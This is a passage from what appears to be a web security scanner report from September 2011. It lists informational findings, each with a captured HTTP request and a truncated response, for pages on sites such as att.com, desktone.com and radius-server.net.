Path:   /navservice/navservlet

Request

GET /navservice/navservlet?locale=en_US HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; B2CSESSIONID=Q2lRTzzXGBJTxL!-1935813224; DYN_USER_ID=4200816524; DYN_USER_CONFIRM=9364325c1a8e3d6fcb7f813ca16d55db; BIGipServerpATTWL_7010_7011=1037160839.25115.0000; meteor_referrer_cache=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u; 49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=%7B%22parent_id%22%3A%224pj9azku6R1%22%2C%22referrer%22%3A%22http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u%22%2C%22id%22%3A%221gfCnkBxeSl%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%23fbid%3D4pj9azku6R1%3Fsource%3DECbc0000000WIP00O%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; fsr.s=%7B%22cp%22%3A%7B%22u-verse_avail%22%3A%22unknown%22%7D%7D; fsr.a=1316239908007

Response

HTTP/1.1 200 OK
Server: Apache
Access-Control-Allow-Origin: *
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 85230
Date: Sat, 17 Sep 2011 01:52:44 GMT
Connection: close

[{"id":"p2001","url":"http://www.att.com/shop/index.jsp","displayName":
"SHOP","code":"010000","isHead":false,"image":"","windowLocation":"N",
"specialTreatment":"","advanced":"","actionType":
...[SNIP]...

26.59. http://www.bostonheraldineducation.com/blog-posts.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonheraldineducation.com
Path:   /blog-posts.php

Request

GET /blog-posts.php HTTP/1.1
Host: www.bostonheraldineducation.com
Proxy-Connection: keep-alive
Referer: http://www.bostonheraldineducation.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=235202066.1734371564.1316239564.1316239564.1316239564.1; __utmb=235202066.1.10.1316239564; __utmc=235202066; __utmz=235202066.1316239564.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:43 GMT
Content-Type: text/html
Connection: close
Server: Nginx / Varnish
X-Powered-By: PHP/5.2.17
Content-Length: 2936

<div class="boldBlue11pxlineheightCopy">Recent Blog Posts</div>
<h4>Student-Led Debate Teaches Government</h4>
<p>With big elections just over a year away, now is a great time to teach students about
...[SNIP]...

26.60. http://www.bostonheraldineducation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonheraldineducation.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bostonheraldineducation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=235202066.1734371564.1316239564.1316239564.1316239564.1; __utmb=235202066.1.10.1316239564; __utmc=235202066; __utmz=235202066.1316239564.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:43:13 GMT
Content-Type: text/html
Connection: keep-alive
Server: Nginx / Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

26.61. http://www.courier-mta.org/imap/header.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courier-mta.org
Path:   /imap/header.html

Request

GET /imap/header.html HTTP/1.1
Host: www.courier-mta.org
Proxy-Connection: keep-alive
Referer: http://www.courier-mta.org/imap/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:15 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 PHP/4.3.10
Last-Modified: Wed, 06 Jul 2011 12:43:18 GMT
ETag: "1666e6d-b8e-4e145866"
Accept-Ranges: bytes
Content-Length: 2958
Content-Type: text/html

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

26.62. http://www.desktone.com/free_trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.desktone.com
Path:   /free_trial

Request

GET /free_trial HTTP/1.1
Host: www.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.desktone.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17c390f4ca291b33543d7623701803ab; _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160; __utma=172106422.940396514.1316237254.1316237254.1316237254.1; __utmb=172106422.1.10.1316237254; __utmc=172106422; __utmz=172106422.1316237254.1.1.utmcsr=info.desktone.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaw.hosted.virtual.desktop.free.trial.html

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:30:38 GMT
Server: Apache/2.2.20 (FreeBSD) mod_ssl/2.2.20 OpenSSL/0.9.8n DAV/2 PHP/5.3.8 with Suhosin-Patch SVN/1.6.17
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8507
Content-Type: text/html

<script type="text/javascript">
$(document).ready(function(){
       $('.torso').css({
           background: 'none',
           width: 900,
           padding: '0 17px'
       });

$("table.servicePlans > tbody > tr > td:
...[SNIP]...

26.63. http://www.disenter.com/disenter.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /disenter.css

Request

GET /disenter.css HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/search.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:33:35 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3443
Connection: close
Content-Type: text/html

<HTML>

<HEAD><TITLE>404 - File Not Found</TITLE></HEAD>

<BODY BGCOLOR="#FFFFFF">

<CENTER>

<BR><BR>
<TABLE BORDER=1 WIDTH=416 CELLSPACING=0>
<TR>
<TD BGCOLOR=#6666CC>
<TABLE>
<TR>
   
...[SNIP]...

26.64. http://www.disenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:31:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3443
Connection: close
Content-Type: text/html

<HTML>

<HEAD><TITLE>404 - File Not Found</TITLE></HEAD>

<BODY BGCOLOR="#FFFFFF">

<CENTER>

<BR><BR>
<TABLE BORDER=1 WIDTH=416 CELLSPACING=0>
<TR>
<TD BGCOLOR=#6666CC>
<TABLE>
<TR>
   
...[SNIP]...

26.65. https://www.easynews.com/signup/lookit.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.easynews.com
Path:   /signup/lookit.phtml

Request

POST /signup/lookit.phtml HTTP/1.1
Host: www.easynews.com
Connection: keep-alive
Referer: https://www.easynews.com/signup/?accounttype=20&linktype=trialbuttontophome
Content-Length: 39
Origin: https://www.easynews.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer9=4eae35f1b34eae35f1b30a654ca39c; __utmx=40324861.; __utmxx=40324861.; __utma=63532859.1552519903.1316219542.1316219542.1316219542.1; __utmb=63532859.1.10.1316219542; __utmc=63532859; __utmz=63532859.1316219542.1.1.utmgclid=CJzUx83AoqsCFRdlgwod-2urfQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server; PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx

cu=&sp=1b2ee5e1225581be36ba95ef9c06dbf4

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:35:41 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=45, max=300
Connection: Keep-Alive
Content-Type: text/html

3|0

26.66. http://www.elfqrin.com/hacklab/pages/nntpserv.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elfqrin.com
Path:   /hacklab/pages/nntpserv.php

Request

GET /hacklab/pages/nntpserv.php HTTP/1.1
Host: www.elfqrin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:25:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.8-0.dotdeb.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.8-0.dotdeb.1
Set-Cookie: edge_language=en; expires=Sun, 16-Oct-2011 19:25:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: edge_theme=default
Content-Type: text/html
Content-Length: 9262

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><P><CENTER>
<style type="text/css">
.adHeadline {font: bold 11pt Arial; text-decoration: underline; color: #3333FF;}
.adTe
...[SNIP]...

26.67. http://www.ibm.com/ibm100/us/en/icons/v17-hp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /ibm100/us/en/icons/v17-hp.html

Request

GET /ibm100/us/en/icons/v17-hp.html?dojo.preventCache=1316220884577 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:53:50 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Last-Modified: Fri, 16 Sep 2011 02:07:38 GMT
ETag: "10f-751b2e80"
Accept-Ranges: bytes
Cteonnt-Length: 271
Content-Type: text/html
Vary: User-Agent, Accept-Encoding
Content-Length: 271

<div id="ibm-iop"><a href="/ibm100/us/en/icons/cocoagene/"><img alt="IBM100 Sustainable Cocoa: Visit IBM100 to explore today's Icon of Progress" height="98" width="318" src="/images/icp/A542714Y96769I
...[SNIP]...

26.68. http://www.itoncommand.com/demo/xxxx_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /demo/xxxx_main.html

Request

GET /demo/xxxx_main.html HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/demo/VynamicsDemoMod.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.13.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 6545
Date: Sat, 17 Sep 2011 00:30:17 GMT
Content-Type: text/html
ETag: "08bda906930c81:0"
Server: Microsoft-IIS/7.0
Last-Modified: Mon, 26 Nov 2007 20:18:54 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding

&www=www.vynamics.com &comp_name=VYNAMICS &slogan1=Contact Us&slogan2=Get a Quote&slogan3=EXPERIENCED...&contact1=John Smith <br>CEO <br><i>click to contact</i>&contact2=Chuck Mcune <br>VP <br>
...[SNIP]...

26.69. http://www.radius-server.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /

Request

GET / HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:33 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 14467

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>RADIUS Server - Aradial AAA/RADIUS server for RADIUS billing</TITLE>
<meta name="description" content="Aradial
...[SNIP]...

26.70. http://www.radius-server.net/aradial-radius-server-billing-customers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /aradial-radius-server-billing-customers.html

Request

GET /aradial-radius-server-billing-customers.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/radius-billing.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:39:15 GMT
ETag: "18380d3-228c-444eba3536ec0"
Accept-Ranges: bytes
Content-Length: 8844
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Aradial Radius Server Customers</TITLE>
<meta name="description" content="Radius Server (AAA) and Billing Solu
...[SNIP]...

26.71. http://www.radius-server.net/aradial-radius-server-billing-home-content.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /aradial-radius-server-billing-home-content.html

Request

GET /aradial-radius-server-billing-home-content.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:34 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:40:14 GMT
ETag: "18380cb-cef-444eba6d7b380"
Accept-Ranges: bytes
Content-Length: 3311
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server (AAA server) and integration with Billing Solutions Content</TITLE>
<meta name="description" con
...[SNIP]...

26.72. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /aradial-radius-server-billing-partners-inner.html

Request

GET /aradial-radius-server-billing-partners-inner.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:45 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Thu, 24 Jul 2008 04:10:56 GMT
ETag: "18380be-2ab5-452bd3e65d400"
Accept-Ranges: bytes
Content-Length: 10933
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<TITLE>Aradial Wifi Billing Radius Server (AAA) and Radius billing solutions</TITLE>
<meta name="Description" con
...[SNIP]...

26.73. http://www.radius-server.net/aradial-radius-server-billing-partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /aradial-radius-server-billing-partners.html

Request

GET /aradial-radius-server-billing-partners.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-customers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:45 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:39:24 GMT
ETag: "183809d-21cb-444eba3dcc300"
Accept-Ranges: bytes
Content-Length: 8651
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Aradial Radius Server Software for AAA Billing</title>
<meta name="description" content="Radius Server for AAA Radi
...[SNIP]...

26.74. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /aradial-radius-server-billing-pop-main.html

Request

GET /aradial-radius-server-billing-pop-main.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-home-content.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:34 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:40:25 GMT
ETag: "1838096-b6a-444eba77f8c40"
Accept-Ranges: bytes
Content-Length: 2922
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<TITLE>Radius Server (AAA) and Radius Billing Solutions</TITLE>
<meta name="description" content="Aradial RADIUS Serve
...[SNIP]...

26.75. http://www.radius-server.net/blank-inner.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /blank-inner.html

Request

GET /blank-inner.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:35 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:40:29 GMT
ETag: "18380b9-1eb-444eba7bc9540"
Accept-Ranges: bytes
Content-Length: 491
Content-Type: text/html

<head>
<TITLE>Aradial Radius Server</TITLE>
<meta name="description" content="Radius Server (AAA) and Billing Solutions Architecture">
<meta name="keywords" content="billing software, radius ser
...[SNIP]...

26.76. http://www.radius-server.net/radius-billing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /radius-billing.html

Request

GET /radius-billing.html HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:39 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:39:31 GMT
ETag: "1838093-2a4c-444eba44792c0"
Accept-Ranges: bytes
Content-Length: 10828
Content-Type: text/html

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<TITLE>Radius/AAA server products for Radius/AAA Billing solutions</TITLE>
<meta name="description" content="Aradial R
...[SNIP]...

26.77. http://www.radius.cistron.nl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius.cistron.nl
Path:   /

Request

